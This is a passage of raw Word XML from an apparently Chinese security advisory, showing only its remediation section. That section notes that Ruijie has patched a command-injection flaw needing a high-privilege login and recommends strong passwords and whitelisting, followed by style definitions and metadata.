          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EF7060"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>目前厂商已发布升级补丁修复漏洞，补丁获取链接：https://www.ruijie.com.cn/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7C23" w:rsidRPr="000C7C23" w:rsidRDefault="000C7C23" w:rsidP="000C7C23">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7C23">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该漏洞由于正常功能过滤不严格导致存在命令注入，并且需要高权限账号登录操作，建议修改登录密码为强口令，通过白名单控制访问原地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00582736" w:rsidRDefault="00582736"/>
    <w:sectPr w:rsidR="00582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DC"/>
    <w:rsid w:val="000C7C23"/>
    <w:rsid w:val="00582736"/>
    <w:rsid w:val="0088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631BE-83F7-468C-BC4B-1D0FB315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C7C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C7C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7C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C7C2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wxtaplink">
    <w:name w:val="wx_tap_link"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000C7C23"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="richmediameta">
    <w:name w:val="rich_media_meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000C7C23"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C7C23"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="000C7C23"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="article-tag-cardtitle">
    <w:name w:val="article-tag-card__title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000C7C23"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="article-tagitem">
    <w:name w:val="article-tag__item"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000C7C23"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="article-tag-cardright">
    <w:name w:val="article-tag-card__right"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000C7C23"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C7C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C7C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7C2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C7C2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6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415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javascript:void(0);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haishen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>haishen</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-12T04:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-12T04:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>